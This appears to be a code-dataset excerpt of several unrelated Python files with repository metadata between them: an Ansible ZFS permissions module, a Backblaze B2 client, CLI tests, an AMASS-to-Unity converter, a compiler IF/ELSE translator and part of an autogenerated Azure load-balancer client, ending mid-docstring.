self.scope = 'ld'
elif local:
self.scope = 'l'
elif descendents:
self.scope = 'd'
else:
self.module.fail_json(msg='Impossible value for local and descendents')
if not (self.users or self.groups or self.everyone):
if self.state == 'present':
self.module.fail_json(msg='One of `users`, `groups`, or `everyone` must be set')
elif self.state == 'absent':
self.run_method = self.clear
# ansible ensures the else cannot happen here
self.zfs_path = module.get_bin_path('zfs', True)
@property
def current_perms(self):
""" Parse the output of `zfs allow <name>` to retrieve current permissions.
"""
out = self.run_zfs_raw(subcommand='allow')
perms = {
'l': {'u': {}, 'g': {}, 'e': []},
'd': {'u': {}, 'g': {}, 'e': []},
'ld': {'u': {}, 'g': {}, 'e': []},
}
linemap = {
'Local permissions:': 'l',
'Descendent permissions:': 'd',
'Local+Descendent permissions:': 'ld',
}
scope = None
for line in out.splitlines():
scope = linemap.get(line, scope)
if not scope:
continue
try:
if line.startswith('\tuser ') or line.startswith('\tgroup '):
ent_type, ent, cur_perms = line.split()
perms[scope][ent_type[0]][ent] = cur_perms.split(',')
elif line.startswith('\teveryone '):
perms[scope]['e'] = line.split()[1].split(',')
except ValueError:
self.module.fail_json(msg="Cannot parse user/group permission output by `zfs allow`: '%s'" % line)
return perms
def run_zfs_raw(self, subcommand=None, args=None):
""" Run a raw zfs command, fail on error.
"""
cmd = [self.zfs_path, subcommand or self.subcommand] + (args or []) + [self.name]
rc, out, err = self.module.run_command(cmd)
if rc:
self.module.fail_json(msg='Command `%s` failed: %s' % (' '.join(cmd), err))
return out
def run_zfs(self, args):
""" Run zfs allow/unallow with appropriate options as per module arguments.
"""
args = self.recursive_opt + ['-' + self.scope] + args
if self.perms:
args.append(','.join(self.perms))
return self.run_zfs_raw(args=args)
def clear(self):
""" Called by run() to clear all permissions.
"""
changed = False
stdout = ''
for scope, ent_type in product(('ld', 'l', 'd'), ('u', 'g')):
for ent in self.initial_perms[scope][ent_type].keys():
stdout += self.run_zfs(['-%s' % ent_type, ent])
changed = True
for scope in ('ld', 'l', 'd'):
if self.initial_perms[scope]['e']:
stdout += self.run_zfs(['-e'])
changed = True
return (changed, stdout)
def update(self):
""" Update permissions as per module arguments.
"""
stdout = ''
for ent_type, entities in (('u', self.users), ('g', self.groups)):
if entities:
stdout += self.run_zfs(['-%s' % ent_type, ','.join(entities)])
if self.everyone:
stdout += self.run_zfs(['-e'])
return (self.initial_perms != self.current_perms, stdout)
def run(self):
""" Run an operation, return results for Ansible.
"""
exit_args = {'state': self.state}
self.initial_perms = self.current_perms
exit_args['changed'], stdout = self.run_method()
if exit_args['changed']:
exit_args['msg'] = 'ZFS delegated admin permissions updated'
exit_args['stdout'] = stdout
self.module.exit_json(**exit_args)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['absent', 'present']),
users=dict(type='list'),
groups=dict(type='list'),
everyone=dict(type='bool', default=False),
permissions=dict(type='list',
choices=['allow', 'clone', 'create', 'destroy', 'diff', 'hold', 'mount', 'promote',
'readonly', 'receive', 'release', 'rename', 'rollback', 'send', 'share',
'snapshot', 'unallow']),
local=dict(type='bool'),
descendents=dict(type='bool'),
recursive=dict(type='bool', default=False),
),
supports_check_mode=False,
required_if=[('state', 'present', ['permissions'])],
)
zfs_delegate_admin = ZfsDelegateAdmin(module)
zfs_delegate_admin.run()
if __name__ == '__main__':
main()
| 1,525 | 4,383 | 46 |
c37c17386d62d65f5ba6388fde11f69c4d3ea317 | 590 | py | Python | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | 1 - Fundamentos Python/Aula14.py | elton-souza/IGTI-Python | 2633dd70af8403a6ab52f8f97ee53063dbb0ef77 | [
"MIT"
] | null | null | null | #Funções
''''
===========================================
def equacao_reta(x):
y_x = 2 * x + 1
return y_x
x = float(input("Entre com o valor a ser calculado para y(x) = 2x+1: "))
resultado = equacao_reta(x)
print("O resultado encontrado foi Y = %.0f" %resultado)
============================================
'''
lista_x = [1,2,3,4,5,6]
lista_y = []
for valor_x in lista_x:
lista_y.append(equacao_reta(valor_x))
for valor_x,valor_y in zip(lista_x,lista_y):
print("O valor de y(%0.1f) = %0.1f"%(valor_x,valor_y)) | 24.583333 | 72 | 0.540678 | #Funções
''''
===========================================
def equacao_reta(x):
y_x = 2 * x + 1
return y_x
x = float(input("Entre com o valor a ser calculado para y(x) = 2x+1: "))
resultado = equacao_reta(x)
print("O resultado encontrado foi Y = %.0f" %resultado)
============================================
'''
def equacao_reta(X):
y_x = 2 * X + 1
return y_x
lista_x = [1,2,3,4,5,6]
lista_y = []
for valor_x in lista_x:
lista_y.append(equacao_reta(valor_x))
for valor_x,valor_y in zip(lista_x,lista_y):
print("O valor de y(%0.1f) = %0.1f"%(valor_x,valor_y)) | 34 | 0 | 22 |
c7c474c76f41f3c6859a3bf71ad2eb3dfbade394 | 5,319 | py | Python | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | null | null | null | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | null | null | null | backblaze/bucket/blocking/file.py | WardPearce/aiob2 | 3dcff9c3aa7612ce7b43375fca379c1358121a4a | [
"MIT"
] | 1 | 2019-07-16T03:38:49.000Z | 2019-07-16T03:38:49.000Z | from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
| 23.745536 | 72 | 0.51645 | from typing import Tuple, cast
from ..base import BaseFile
from .part import BlockingParts
from ...models.file import (
FileModel,
UploadUrlModel,
FileDeleteModel,
PartCancelModel
)
from ...settings import DownloadSettings, CopyFileSettings
from ...exceptions import AwaitingOnly
from ...utils import UploadUrlCache
from ...decorators import authorize_required
class BlockingFile(BaseFile):
def parts(self, part_number: int = 0) -> BlockingParts:
"""Used to upload a parts.
Parameters
----------
part_number : int, optional
by default 0
Returns
-------
BlockingParts
"""
return BlockingParts(
self,
self._context,
part_number
)
@authorize_required
def copy(self, settings: CopyFileSettings
) -> Tuple[FileModel, "BlockingFile"]:
"""Used copy a file.
Parameters
----------
settings : CopyFileSettings
Returns
-------
FileModel
BlockingFile
"""
data = cast(
dict,
self._context._post(
url=self._context._routes.file.copy,
json={"sourceFileId": self.file_id, **settings.payload},
include_account=False
)
)
return (
FileModel(data),
BlockingFile(data["fileId"], self._context, self.bucket_id)
)
@authorize_required
def cancel(self) -> PartCancelModel:
"""Used for cancelling a uncompleted file.
Returns
-------
PartCancelModel
Holds details on canceled file.
"""
UploadUrlCache(self.bucket_id, self.file_id).delete()
return PartCancelModel(
self._context._post(
url=self._context._routes.file.cancel_large,
json={"fileId": self.file_id},
include_account=False
)
)
@authorize_required
def get(self) -> FileModel:
"""Used to get details on a file.
Returns
-------
FileModel
Holds details on a file
"""
return FileModel(
self._context._post(
url=self._context._routes.file.get,
json={"fileId": self.file_id},
include_account=False
)
)
@authorize_required
def delete(self, name: str = None) -> FileDeleteModel:
"""Deletes give file.
Parameters
----------
name : str, optional
Name of file, if not given calls self.get,
by default None.
Returns
-------
FileDeleteModel
Holds details on delete file.
"""
if not name:
name = (self.get()).file_name
return FileDeleteModel(
self._context._post(
url=self._context._routes.file.delete,
json={"fileName": name, "fileId": self.file_id},
include_account=False
)
)
@authorize_required
def upload_url(self) -> UploadUrlModel:
"""Used to get a part upload URL.
Returns
-------
UploadUrlModel
Holds details on the upload URL.
Notes
-----
Caching is used.
"""
cache = UploadUrlCache(self.bucket_id, self.file_id)
upload_url = cache.find()
if upload_url:
return cast(
UploadUrlModel,
upload_url
)
return cache.save(UploadUrlModel(
self._context._post(
url=self._context._routes.upload.upload_part,
json={
"fileId": self.file_id
},
include_account=False
)
))
@authorize_required
def download(self, settings: DownloadSettings = None) -> bytes:
"""Used to download file into memory.
Parameters
----------
settings : DownloadSettings
Returns
-------
bytes
"""
if not settings:
params = {"fileId": self.file_id}
headers = None
else:
params = {"fileId": self.file_id, **settings.parameters}
headers = settings.headers
return cast(
bytes,
self._context._get(
url=self._context._routes.file.download_by_id,
headers=headers,
params=params,
resp_json=False,
include_account=False,
)
)
def download_iterate(self) -> None:
"""This doesn't work, only here for a identical API.
Raises
------
AwaitingOnly
Raised when a coroutine called is awaiting supported only.
"""
raise AwaitingOnly()
def save(self, settings: DownloadSettings, pathway: str) -> None:
"""Used to save a file to a local pathway.
Parameters
----------
settings : DownloadSettings
pathway : str
Local pathway to save to.
"""
with open(pathway, "wb") as f:
f.write(self.download(settings))
| 0 | 4,911 | 23 |
dada64951a88cc9b3c1e8529d630a408834f5716 | 1,649 | py | Python | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 7 | 2017-07-15T12:44:23.000Z | 2020-03-24T09:45:11.000Z | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 13 | 2017-07-05T09:34:09.000Z | 2021-04-20T08:18:46.000Z | tests/cli/test_capabilities.py | selectel/python-selvpcclient | 99955064215c2be18b568e5e9b34f17087ec304f | [
"Apache-2.0"
] | 9 | 2017-06-29T13:51:35.000Z | 2021-06-26T21:00:49.000Z | from tests.cli import make_client, run_cmd
from tests.util import answers
| 28.929825 | 65 | 0.740449 | from tests.cli import make_client, run_cmd
from tests.util import answers
def test_capabilities_show_licenses():
count_of_licenses = 1
client = make_client(return_value=answers.CAPABILITIES_LIST)
args = ['capabilities show licenses']
licenses = run_cmd(args, client, json_output=True)
assert len(licenses) == count_of_licenses
assert licenses[0]['type'] == 'license_windows_2012_standard'
def test_capabilities_show_regions():
count_of_zones = 3
client = make_client(return_value=answers.CAPABILITIES_LIST)
args = ['capabilities show regions']
regions = run_cmd(args, client, json_output=True)
assert len(regions) == count_of_zones
def test_capabilities_show_resources():
count_of_resources = 10
client = make_client(return_value=answers.CAPABILITIES_LIST)
args = ['capabilities show resources']
resources = run_cmd(args, client, json_output=True)
assert len(resources) == count_of_resources
def test_capabilities_show_subnets():
count_of_subnets = 1
client = make_client(return_value=answers.CAPABILITIES_LIST)
args = ['capabilities show subnets']
subnets = run_cmd(args, client, json_output=True)
assert len(subnets) == count_of_subnets
assert subnets[0]['type'] == 'ipv4'
assert subnets[0]['prefix_length'] == '29'
assert 'availability' in subnets[0]
def test_capabilities_show_traffic():
count_of_granularities = 3
client = make_client(return_value=answers.CAPABILITIES_LIST)
args = ['capabilities show traffic']
traffic = run_cmd(args, client, json_output=True)
assert len(traffic) == count_of_granularities
| 1,455 | 0 | 115 |
c40c41135506377f0f359d5c0a330b5d9eec0701 | 4,699 | py | Python | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | src/lib/utils/convert_to_unity_json.py | gngdb/ROMP | a940af92e266530f4fe65807ab5920f0b4246511 | [
"Apache-2.0"
] | null | null | null | # Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
if __name__ == "__main__":
main() | 35.870229 | 118 | 0.633326 | # Imports
import numpy as np
import os
import json
import sys
# noinspection PyPep8Naming
from scipy.spatial.transform import Rotation
# This class converts AMASS SMPLH .npz body animation files into Unity-readable .json files.
# See AMASSConverterExamples file for an example on how to use this class.
class AMASSDataConverter:
# SMPLH Parameters
JOINTS = 52
ROTATION_VECTOR_DIMENSIONS = 3
QUATERNION_DIMENSIONS = 4
# Local variable initialization for static-typing (stupid python)
gender: np.ndarray
betas: np.ndarray
poses: np.ndarray
dmpls: np.ndarray
trans: np.ndarray
frames: int
fps: int
poses_as_quaternion: np.ndarray
# Constructor for class
def __init__(self, npz_file_path: str, show_messages=True):
self.show_messages = show_messages
self.npzFile = npz_file_path
# Load npz file
self.data = self.load_data()
# Read data from loaded file
self.read_data()
# AMASS poses are exponential rotation vectors, unity needs quaternions.
reshaped_poses = np.reshape(self.poses, [self.poses.shape[0], self.JOINTS, self.ROTATION_VECTOR_DIMENSIONS])
self.convert_poses_to_quaternions(reshaped_poses)
# convert data to dicts, since JSON is dictionary-based format
self.data_as_dict = {
"gender": self.gender,
"trans": self.trans,
"poses": self.poses_as_quaternion,
"betas": self.betas,
"dmpls": self.dmpls,
"fps": self.fps,
}
# Converts poses from exponential rotation vectors to quaternions
def convert_poses_to_quaternions(self, reshaped_poses):
poses_as_quaternion = np.empty([self.frames, self.JOINTS, self.QUATERNION_DIMENSIONS])
for frameIndex in range(0, self.frames):
for poseIndex in range(0, self.JOINTS):
rotation_vector_raw = reshaped_poses[frameIndex][poseIndex]
rotation = Rotation.from_rotvec(rotation_vector_raw)
quaternion = rotation.as_quat()
poses_as_quaternion[frameIndex][poseIndex] = quaternion
self.poses_as_quaternion = poses_as_quaternion
# This sets up the converter from numpy arrays to json. Will spit error if not numpy.
@staticmethod
def default_encoding(obj):
if type(obj).__module__ == np.__name__:
if isinstance(obj, np.ndarray):
return obj.tolist()
else:
return obj.item()
raise TypeError('Unknown type:', type(obj))
# Reads data from loaded npz file and creates internal objects
def read_data(self):
self.gender = 'male'
#self.data['gender'].astype(str)
self.betas = self.data['betas']
self.poses = self.data['poses']
self.dmpls = self.data['dmpls']
self.trans = self.data['trans']
self.frames = self.poses.shape[0]
self.fps = round(int(np.rint(self.data['mocap_framerate'])))
if self.show_messages:
print(f"Created converter for file: {self.npzFile}")
print(f'\tgender: {self.gender}')
print(f'\tbetas: {self.betas.shape}')
print(f'\tposes: {self.poses.shape}')
print(f'\tdmpls: {self.dmpls.shape}')
print(f'\ttrans: {self.trans.shape}')
print(f'\tframes detected: {self.frames}')
print(f'\tfps: {self.fps}')
# Loads npz file into data structure
def load_data(self):
# noinspection PyBroadException
try:
data = np.load(self.npzFile)
return data
except Exception:
print(f'Could not read {self.npzFile}! Skipping...')
# Finishes conversion and saves dicts into JSON format
def write_to_json(self, json_path: str):
if self.show_messages:
print(f"\nWriting to json... {json_path}")
filename, file_extension = os.path.splitext(json_path)
if file_extension != '.json':
print(f"Incorrect extension specified ({file_extension}). Needs to be .json.")
return
dumped = json.dumps(self.data_as_dict, default=self.default_encoding, indent=4)
with open(json_path, 'w') as f:
f.write(dumped)
if self.show_messages:
print('\n *** DONE CONVERSION ***\n')
def main():
if len(sys.argv) != 3:
print("Not the right number of arguments. First should be source npz file path, second should be destination "
"json path.")
return
converter = AMASSDataConverter(sys.argv[1])
converter.write_to_json(sys.argv[2])
if __name__ == "__main__":
main() | 3,418 | 891 | 45 |
16ecfe92c17399c41032ef0e4fe40d1863d16039 | 5,128 | py | Python | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 35 | 2020-12-07T03:11:43.000Z | 2021-04-15T17:38:16.000Z | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 47 | 2020-12-09T01:29:09.000Z | 2021-01-13T05:37:50.000Z | parser/fase2/team17/Traduccion/InterpreteF2/IF/SIELSE.py | Josue-Zea/tytus | f9e4be9a8c03eb698fade7a748972e4f52d46685 | [
"MIT"
] | 556 | 2020-12-07T03:13:31.000Z | 2021-06-17T17:41:10.000Z | from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
# Reglas de optimizacion
# Regla 4
# Regla 5 | 33.083871 | 108 | 0.573908 | from InterpreteF2.NodoAST import NodoArbol
from InterpreteF2.Tabla_de_simbolos import Tabla_de_simbolos
from InterpreteF2.Arbol import Arbol
from InterpreteF2.Valor.Valor import Valor
from InterpreteF2.Primitivos.TIPO import TIPO
from InterpreteF2.Primitivos.COMPROBADOR_deTipos import COMPROBADOR_deTipos
from InterpreteF2.Reporteria.ReporteOptimizacion import ReporteOptimizacion
class SIELSE(NodoArbol):
def __init__(self, exp, body, contrabody, line, coliumn):
super().__init__(line, coliumn)
self.exp = exp
self.body = body
self.contrabody = contrabody
self.linea = line
self.columna = coliumn
def analizar_semanticamente(self, entorno: Tabla_de_simbolos, arbol:Arbol):
pass
def traducir(self, entorno: Tabla_de_simbolos, arbol:Arbol):
# REGLA 4
if self.exp.validador_Regla4(entorno, Arbol):
return self.traducir_regla4(entorno, arbol)
# REGLA 5
if self.exp.validador_Regla5(entorno, Arbol):
return self.traducir_regla5(entorno, arbol)
Bv = arbol.getLabel()
Bf = arbol.getLabel()
validacion = str(self.exp.traducir(entorno, arbol))
Btemporal = arbol.getLabel()
arbol.addC3D("if " + validacion + ':')
arbol.addIdentacion()
arbol.addC3D("goto ." + str(Bv))
arbol.popIdentacion()
arbol.addC3D('else:')
arbol.addIdentacion()
arbol.addC3D("goto ." + Bf)
arbol.popIdentacion()
arbol.addC3D('label .' + Bv)
for item in self.body:
item.traducir(entorno, arbol)
arbol.addC3D("goto ." + Btemporal)
arbol.addC3D('label .' + Bf)
for item in self.contrabody:
item.traducir(entorno, arbol)
arbol.addC3D('label .' + Btemporal)
# optimizacion ---------------------------
# Regla no.3:
original = "if " + validacion + " goto " + str(Bv) + ' goto ' + str(Bf)
optimizado = "if " + validacion + " goto " + str(Bf)
reportero = ReporteOptimizacion('Regla 3', original, optimizado, str(self.linea), str(self.columna))
arbol.ReporteOptimizacion.append(reportero)
# ----------------------------------------------------------------
return
def execute(self, entorno: Tabla_de_simbolos, arbol:Arbol):
pass
def getString(self, entorno: Tabla_de_simbolos, arbol:Arbol):
pass
def getValueAbstract(self, entorno: Tabla_de_simbolos, arbol:Arbol):
pass
# Reglas de optimizacion
# Regla 4
def traducir_regla4(self, entorno: Tabla_de_simbolos, arbol: Arbol):
Bv = arbol.getLabel()
Bf = arbol.getLabel()
validacion = str(self.exp.traducir(entorno, arbol))
Btemporal = arbol.getLabel()
arbol.addC3D("if " + validacion + ':')
arbol.addIdentacion()
arbol.addC3D("goto ." + str(Bv))
arbol.popIdentacion()
arbol.addC3D('else:')
arbol.addIdentacion()
arbol.addC3D("goto ." + Bf)
arbol.popIdentacion()
arbol.addC3D('label .' + Bv)
for item in self.body:
item.traducir(entorno, arbol)
arbol.addC3D("goto ." + Btemporal)
arbol.addC3D('label .' + Bf)
for item in self.contrabody:
item.traducir(entorno, arbol)
arbol.addC3D('label .' + Btemporal)
# optimizacion ---------------------------
# Regla no.4:
original = "if " + validacion + " goto " + str(Bv) + ' goto ' + str(Bf)
optimizado = "goto " + str(Bv)
reportero = ReporteOptimizacion('Regla 4', original, optimizado, str(self.linea), str(self.columna))
arbol.ReporteOptimizacion.append(reportero)
# ----------------------------------------------------------------
return
# Regla 5
def traducir_regla5(self, entorno: Tabla_de_simbolos, arbol: Arbol):
Bv = arbol.getLabel()
Bf = arbol.getLabel()
validacion = str(self.exp.traducir(entorno, arbol))
Btemporal = arbol.getLabel()
arbol.addC3D("if " + validacion + ':')
arbol.addIdentacion()
arbol.addC3D("goto ." + str(Bv))
arbol.popIdentacion()
arbol.addC3D('else:')
arbol.addIdentacion()
arbol.addC3D("goto ." + Bf)
arbol.popIdentacion()
arbol.addC3D('label .' + Bv)
for item in self.body:
item.traducir(entorno, arbol)
arbol.addC3D("goto ." + Btemporal)
arbol.addC3D('label .' + Bf)
for item in self.contrabody:
item.traducir(entorno, arbol)
arbol.addC3D('label .' + Btemporal)
# optimizacion ---------------------------
# Regla no.5:
original = "if " + validacion + " goto " + str(Bv) + ' goto ' + str(Bf)
optimizado = "goto " + str(Bf)
reportero = ReporteOptimizacion('Regla 5', original, optimizado, str(self.linea), str(self.columna))
arbol.ReporteOptimizacion.append(reportero)
# ----------------------------------------------------------------
return | 4,447 | 3 | 237 |
b79dfb2731620c5e4b9d0314f5a7523683aeb4e4 | 577 | py | Python | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | modules/tests/test_strtodate.py | OpenSO2/so2eval | 0bc896360f8021e930bdadc707540220fe6b0f9e | [
"MIT"
] | null | null | null | # coding: utf-8
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
| 28.85 | 137 | 0.667244 | # coding: utf-8
import sys
import os
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from strtodate import strtodate
def test_strtodate():
pattern = ".*(?P<year>\w{4})_(?P<month>\w{2})_(?P<day>\w{2})-(?P<hour>\w{2})_(?P<minute>\w{2})_(?P<second>\w{2})_(?P<millisecond>\w{3})"
string = "testing_2017_06_08-12_19_44_091_cam_bot.png"
date = strtodate(pattern, string)
assert(date)
assert(date.year == 2017)
assert(date.month == 6)
assert(date.day == 8)
assert(date.hour == 12)
assert(date.minute == 19)
assert(date.second == 44)
assert(date.microsecond == 91000)
| 432 | 0 | 23 |
4ab81df6dbe52b14c06f999571d26610f09615e1 | 9,696 | py | Python | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | 2 | 2020-07-22T18:53:05.000Z | 2021-09-11T05:52:33.000Z | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-network/azure/cli/command_modules/network/mgmt_lb/lib/operations/lb_operations.py | enterstudio/azure-cli | b0504c3b634e17f1afc944a9572864a40da6bc18 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
"""LbOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def create_or_update(
self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
"""
Create or update a virtual machine.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param load_balancer_name: Name for load balancer.
:type load_balancer_name: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param backend_pool_name: Name of load balancer backend pool.
:type backend_pool_name: str
:param dns_name_type: Associate VMs with a public IP address to a DNS
name. Possible values include: 'none', 'new'
:type dns_name_type: str or :class:`dnsNameType
<lbcreationclient.models.dnsNameType>`
:param frontend_ip_name: Name of the frontend IP configuration.
:type frontend_ip_name: str
:param location: Location for load balancer resource.
:type location: str
:param private_ip_address: Static private IP address to use.
:type private_ip_address: str
:param private_ip_address_allocation: Private IP address allocation
method. Possible values include: 'dynamic', 'static'
:type private_ip_address_allocation: str or
:class:`privateIpAddressAllocation
<lbcreationclient.models.privateIpAddressAllocation>`
:param public_ip_address: Name or ID of the public IP address to use.
:type public_ip_address: str
:param public_ip_address_allocation: Public IP address allocation
method. Possible values include: 'dynamic', 'static'
:type public_ip_address_allocation: str or
:class:`publicIpAddressAllocation
<lbcreationclient.models.publicIpAddressAllocation>`
:param public_ip_address_type: Type of Public IP Address to associate
with the load balancer. Possible values include: 'none', 'new',
'existingName', 'existingId'
:type public_ip_address_type: str or :class:`publicIpAddressType
<lbcreationclient.models.publicIpAddressType>`
:param public_ip_dns_name: Globally unique DNS Name for the Public IP
used to access the Virtual Machine (new public IP only).
:type public_ip_dns_name: str
:param subnet: The subnet name or ID to associate with the load
balancer. Cannot be used in conjunction with a Public IP.
:type subnet: str
:param subnet_address_prefix: The subnet address prefix in CIDR
format (new subnet only).
:type subnet_address_prefix: str
:param subnet_type: Use new, existing or no subnet. Possible values
include: 'none', 'new', 'existingName', 'existingId'
:type subnet_type: str or :class:`subnetType
<lbcreationclient.models.subnetType>`
:param tags: Tags object.
:type tags: object
:param virtual_network_name: The VNet name containing the subnet.
Cannot be used in conjunction with a Public IP.
:type virtual_network_name: str
:param vnet_address_prefix: The virtual network IP address prefix in
CIDR format (new subnet only).
:type vnet_address_prefix: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
parameters = models.DeploymentLb(content_version=content_version, backend_pool_name=backend_pool_name, dns_name_type=dns_name_type, frontend_ip_name=frontend_ip_name, load_balancer_name=load_balancer_name, location=location, private_ip_address=private_ip_address, private_ip_address_allocation=private_ip_address_allocation, public_ip_address=public_ip_address, public_ip_address_allocation=public_ip_address_allocation, public_ip_address_type=public_ip_address_type, public_ip_dns_name=public_ip_dns_name, subnet=subnet, subnet_address_prefix=subnet_address_prefix, subnet_type=subnet_type, tags=tags, virtual_network_name=virtual_network_name, vnet_address_prefix=vnet_address_prefix)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.Resources/deployments/{deploymentName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'deploymentName': self._serialize.url("deployment_name", deployment_name, 'str', max_length=64, min_length=1, pattern='^[-\w\._]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'DeploymentLb')
# Construct and send request
if raw:
response = long_running_send()
return get_long_running_output(response)
long_running_operation_timeout = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
return AzureOperationPoller(
long_running_send, get_long_running_output,
get_long_running_status, long_running_operation_timeout)
| 52.129032 | 694 | 0.680693 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
#pylint: skip-file
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator 0.17.0.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrestazure.azure_operation import AzureOperationPoller
import uuid
from .. import models
class LbOperations(object):
"""LbOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def create_or_update(
self, resource_group_name, deployment_name, load_balancer_name, content_version=None, backend_pool_name=None, dns_name_type="none", frontend_ip_name="LoadBalancerFrontEnd", location=None, private_ip_address=None, private_ip_address_allocation="dynamic", public_ip_address=None, public_ip_address_allocation="dynamic", public_ip_address_type="new", public_ip_dns_name=None, subnet=None, subnet_address_prefix="10.0.0.0/24", subnet_type="none", tags=None, virtual_network_name=None, vnet_address_prefix="10.0.0.0/16", custom_headers=None, raw=False, **operation_config):
"""
Create or update a virtual machine.
:param resource_group_name: The name of the resource group. The name
